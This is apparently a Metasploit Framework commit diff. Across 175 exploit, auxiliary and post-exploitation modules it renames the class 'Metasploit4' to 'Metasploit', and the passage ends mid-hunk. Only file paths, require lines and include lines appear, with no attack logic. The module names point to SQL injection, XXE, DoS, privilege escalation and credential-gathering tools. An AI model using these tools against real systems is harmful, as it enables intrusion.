modules/exploits/linux/http/efw_chpasswd_exec.rb | 2 +- .../linux/http/foreman_openstack_satellite_code_exec.rb | 2 +- modules/exploits/linux/http/nginx_chunked_size.rb | 2 +- modules/exploits/linux/http/railo_cfml_rfi.rb | 2 +- modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb | 2 +- modules/exploits/linux/local/desktop_privilege_escalation.rb | 2 +- modules/exploits/linux/local/hp_smhstart.rb | 2 +- modules/exploits/linux/local/kloxo_lxsuexec.rb | 2 +- modules/exploits/linux/local/pkexec.rb | 2 +- modules/exploits/linux/local/sock_sendpage.rb | 2 +- modules/exploits/linux/local/sophos_wpa_clear_keys.rb | 2 +- modules/exploits/linux/local/udev_netlink.rb | 2 +- modules/exploits/linux/local/vmware_mount.rb | 2 +- modules/exploits/linux/local/zpanel_zsudo.rb | 2 +- modules/exploits/linux/misc/hikvision_rtsp_bof.rb | 2 +- modules/exploits/linux/smtp/exim_gethostbyname_bof.rb | 2 +- modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb | 2 +- modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb | 2 +- modules/exploits/multi/http/caidao_php_backdoor_exec.rb | 2 +- modules/exploits/multi/http/cups_bash_env_exec.rb | 2 +- modules/exploits/multi/http/gestioip_exec.rb | 2 +- modules/exploits/multi/http/git_client_command_exec.rb | 2 +- modules/exploits/multi/http/ispconfig_php_exec.rb | 2 +- modules/exploits/multi/http/jboss_invoke_deploy.rb | 2 +- modules/exploits/multi/http/moodle_cmd_exec.rb | 2 +- modules/exploits/multi/http/movabletype_upgrade_exec.rb | 2 +- modules/exploits/multi/http/nas4free_php_exec.rb | 2 +- modules/exploits/multi/http/phpmoadmin_exec.rb | 2 +- modules/exploits/multi/http/uptime_file_upload_2.rb | 2 +- modules/exploits/multi/http/werkzeug_debug_rce.rb | 2 +- modules/exploits/multi/http/zabbix_script_exec.rb | 2 +- modules/exploits/multi/misc/xdh_x_exec.rb | 2 +- modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb | 2 +- .../exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb | 2 +- modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb | 2 +- modules/exploits/osx/local/dyld_print_to_file_root.rb | 2 +- modules/exploits/osx/local/rootpipe.rb | 2 +- modules/exploits/osx/local/rootpipe_entitlements.rb | 2 +- modules/exploits/osx/local/rsh_libmalloc.rb | 2 +- modules/exploits/osx/local/setuid_tunnelblick.rb | 2 +- modules/exploits/osx/local/setuid_viscosity.rb | 2 +- modules/exploits/osx/local/tpwn.rb | 2 +- modules/exploits/unix/local/chkrootkit.rb | 2 +- modules/exploits/unix/local/setuid_nmap.rb | 2 +- modules/exploits/windows/browser/apple_quicktime_rdrf.rb | 2 +- modules/exploits/windows/browser/ms14_064_ole_code_execution.rb | 2 +- modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb | 2 +- modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb | 2 +- modules/exploits/windows/ftp/bison_ftp_bof.rb | 2 +- modules/exploits/windows/ftp/freefloatftp_user.rb | 2 +- modules/exploits/windows/ftp/sami_ftpd_list.rb | 2 +- modules/exploits/windows/http/netgear_nms_rce.rb | 2 +- modules/exploits/windows/http/sepm_auth_bypass_rce.rb | 2 +- modules/exploits/windows/local/applocker_bypass.rb | 2 +- modules/exploits/windows/local/persistence.rb | 2 +- modules/exploits/windows/local/registry_persistence.rb | 2 +- modules/post/android/capture/screen.rb | 2 +- modules/post/android/manage/remove_lock.rb | 2 +- modules/post/android/manage/remove_lock_root.rb | 2 +- modules/post/linux/gather/openvpn_credentials.rb | 2 +- modules/post/multi/gather/rubygems_api_key.rb | 2 +- modules/post/windows/gather/ntds_location.rb | 2 +- modules/post/windows/manage/killav.rb | 2 +- modules/post/windows/manage/sticky_keys.rb | 2 +- 175 files changed, 175 insertions(+), 175 deletions(-) diff --git a/modules/auxiliary/admin/appletv/appletv_display_image.rb b/modules/auxiliary/admin/appletv/appletv_display_image.rb index 5b009c7889..4bec3cb4e3 100644 --- a/modules/auxiliary/admin/appletv/appletv_display_image.rb +++ b/modules/auxiliary/admin/appletv/appletv_display_image.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/appletv/appletv_display_video.rb b/modules/auxiliary/admin/appletv/appletv_display_video.rb index ff0370dc4a..88e5e864de 100644 --- a/modules/auxiliary/admin/appletv/appletv_display_video.rb +++ b/modules/auxiliary/admin/appletv/appletv_display_video.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/chromecast/chromecast_reset.rb b/modules/auxiliary/admin/chromecast/chromecast_reset.rb index cd245599e9..0e965f75a1 100644 --- a/modules/auxiliary/admin/chromecast/chromecast_reset.rb +++ b/modules/auxiliary/admin/chromecast/chromecast_reset.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/chromecast/chromecast_youtube.rb b/modules/auxiliary/admin/chromecast/chromecast_youtube.rb index 5263d13b1f..e741ca279c 100644 --- a/modules/auxiliary/admin/chromecast/chromecast_youtube.rb +++ b/modules/auxiliary/admin/chromecast/chromecast_youtube.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb b/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb index 6d93c9e626..cccc1d1f0d 100644 --- a/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb +++ b/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/firetv/firetv_youtube.rb b/modules/auxiliary/admin/firetv/firetv_youtube.rb index ffeedd5885..36fac9865f 100644 --- a/modules/auxiliary/admin/firetv/firetv_youtube.rb +++ b/modules/auxiliary/admin/firetv/firetv_youtube.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb index 9d89a5b782..feb085fe81 100644 --- a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb +++ b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb @@ -8,7 +8,7 @@ require 'bcrypt' require 'digest' require 'openssl' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb b/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb index 0fb48eb584..924d344a3c 100644 --- a/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb +++ b/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb b/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb index e442620315..c199b375c9 100644 --- a/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb +++ b/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/netgear_auth_download.rb b/modules/auxiliary/admin/http/netgear_auth_download.rb index c79e02e6c4..ba2d3c65df 100644 --- a/modules/auxiliary/admin/http/netgear_auth_download.rb +++ b/modules/auxiliary/admin/http/netgear_auth_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb index 773973688e..ee807a6583 100644 --- a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb +++ b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rapid7/nexpose' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/openbravo_xxe.rb b/modules/auxiliary/admin/http/openbravo_xxe.rb index 8f7bacd0cf..ab4d997c11 100644 --- a/modules/auxiliary/admin/http/openbravo_xxe.rb +++ b/modules/auxiliary/admin/http/openbravo_xxe.rb @@ -8,7 +8,7 @@ require 'rex' require 'net/dns' require 'rexml/document' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb index dd8fb6ca8c..ecd8becd89 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/typo3_sa_2010_020.rb b/modules/auxiliary/admin/http/typo3_sa_2010_020.rb index 69db942e3a..147c053cc8 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2010_020.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2010_020.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'thread' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb b/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb index e908b1bd14..0f3c5b18cf 100644 --- a/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb +++ b/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb b/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb index 6c8f0d29c3..74d381e2a4 100644 --- a/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb +++ b/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Kerberos::Client diff --git a/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb b/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb index 43f91cf73e..febc605745 100644 --- a/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb +++ b/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb b/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb index 383b187968..51f6ea0085 100644 --- a/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb +++ b/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/dos/dns/bind_tkey.rb b/modules/auxiliary/dos/dns/bind_tkey.rb index 4b29d365b7..badbd6770d 100644 --- a/modules/auxiliary/dos/dns/bind_tkey.rb +++ b/modules/auxiliary/dos/dns/bind_tkey.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb b/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb index f40516c242..4f5179fd26 100644 --- a/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb +++ b/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/misc/dopewars.rb b/modules/auxiliary/dos/misc/dopewars.rb index e21ccb27b4..986f6b6c70 100644 --- a/modules/auxiliary/dos/misc/dopewars.rb +++ b/modules/auxiliary/dos/misc/dopewars.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb index d04a70f6a0..7d8e3b4c9f 100644 --- a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb b/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb index e4aa509cd1..100af11a71 100644 --- a/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb +++ b/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/dos/ssl/openssl_aesni.rb b/modules/auxiliary/dos/ssl/openssl_aesni.rb index 76f0db506d..e33a8895ed 100644 --- a/modules/auxiliary/dos/ssl/openssl_aesni.rb +++ b/modules/auxiliary/dos/ssl/openssl_aesni.rb @@ -6,7 +6,7 @@ # auxilary/dos/ssl/openssl_aesni require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/gather/alienvault_iso27001_sqli.rb b/modules/auxiliary/gather/alienvault_iso27001_sqli.rb index 8838dd445e..affe62a9f9 100644 --- a/modules/auxiliary/gather/alienvault_iso27001_sqli.rb +++ b/modules/auxiliary/gather/alienvault_iso27001_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb b/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb index 3eeeb94f06..6d73acccaa 100644 --- a/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb +++ b/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/chromecast_wifi.rb b/modules/auxiliary/gather/chromecast_wifi.rb index 5b0c218f6d..545ca56f35 100644 --- a/modules/auxiliary/gather/chromecast_wifi.rb +++ b/modules/auxiliary/gather/chromecast_wifi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/impersonate_ssl.rb b/modules/auxiliary/gather/impersonate_ssl.rb index d6e084f9dd..6f6c18472f 100644 --- a/modules/auxiliary/gather/impersonate_ssl.rb +++ b/modules/auxiliary/gather/impersonate_ssl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/joomla_com_realestatemanager_sqli.rb b/modules/auxiliary/gather/joomla_com_realestatemanager_sqli.rb index 60e82d9b5a..b0959b4054 100644 --- a/modules/auxiliary/gather/joomla_com_realestatemanager_sqli.rb +++ b/modules/auxiliary/gather/joomla_com_realestatemanager_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/joomla_contenthistory_sqli.rb b/modules/auxiliary/gather/joomla_contenthistory_sqli.rb index ae03c949d8..2746a2bcc5 100644 --- a/modules/auxiliary/gather/joomla_contenthistory_sqli.rb +++ b/modules/auxiliary/gather/joomla_contenthistory_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/mantisbt_admin_sqli.rb b/modules/auxiliary/gather/mantisbt_admin_sqli.rb index 71f2c64cbd..1900c18a85 100644 --- a/modules/auxiliary/gather/mantisbt_admin_sqli.rb +++ b/modules/auxiliary/gather/mantisbt_admin_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb b/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb index 49278481d6..7dc176fc69 100644 --- a/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb +++ b/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/opennms_xxe.rb b/modules/auxiliary/gather/opennms_xxe.rb index 4f60c931a3..7a6215fbda 100644 --- a/modules/auxiliary/gather/opennms_xxe.rb +++ b/modules/auxiliary/gather/opennms_xxe.rb @@ -1,7 +1,7 @@ require 'msf/core' require 'openssl' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/shodan_search.rb b/modules/auxiliary/gather/shodan_search.rb index 0c192067d9..54524706a2 100644 --- a/modules/auxiliary/gather/shodan_search.rb +++ b/modules/auxiliary/gather/shodan_search.rb @@ -8,7 +8,7 @@ require 'rex' require 'net/https' require 'uri' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb b/modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb index ab1cdd947e..fdb4b3c68c 100644 --- a/modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb +++ b/modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb index d7add8ec02..b77e36f1fd 100644 --- a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb +++ b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb index 78ee78a383..b2c54bde8c 100644 --- a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb +++ b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb b/modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb index b24065de3a..9c4cf1c706 100644 --- a/modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb +++ b/modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb b/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb index b3fb9cfa82..be8229a861 100644 --- a/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb +++ b/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/caidao' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/chromecast_webserver.rb b/modules/auxiliary/scanner/http/chromecast_webserver.rb index 5ac407a826..bed003c58f 100644 --- a/modules/auxiliary/scanner/http/chromecast_webserver.rb +++ b/modules/auxiliary/scanner/http/chromecast_webserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/concrete5_member_list.rb b/modules/auxiliary/scanner/http/concrete5_member_list.rb index 15d9170e91..e8781a41bd 100644 --- a/modules/auxiliary/scanner/http/concrete5_member_list.rb +++ b/modules/auxiliary/scanner/http/concrete5_member_list.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/host_header_injection.rb b/modules/auxiliary/scanner/http/host_header_injection.rb index deea80733c..f39109d09a 100644 --- a/modules/auxiliary/scanner/http/host_header_injection.rb +++ b/modules/auxiliary/scanner/http/host_header_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb b/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb index 39ff1efbeb..05d36726ab 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb index 028e951d5c..5f22fa6fc7 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb index 5d060660b9..cd6d7be3c6 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/http_put.rb b/modules/auxiliary/scanner/http/http_put.rb index baf50cc32c..00aeab0e5f 100644 --- a/modules/auxiliary/scanner/http/http_put.rb +++ b/modules/auxiliary/scanner/http/http_put.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb b/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb index 87894f3c57..20017f0f4a 100644 --- a/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb +++ b/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb b/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb index 760418ed0a..50da62bd4f 100644 --- a/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb +++ b/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb b/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb index 6724111d4e..9b2045705a 100644 --- a/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb +++ b/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb b/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb index de18f8805b..b676a708d4 100644 --- a/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb +++ b/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb b/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb index cabefe1b8f..15dfe5fa12 100644 --- a/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb +++ b/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb b/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb index a7ce79c852..d25af0526f 100644 --- a/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb +++ b/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include 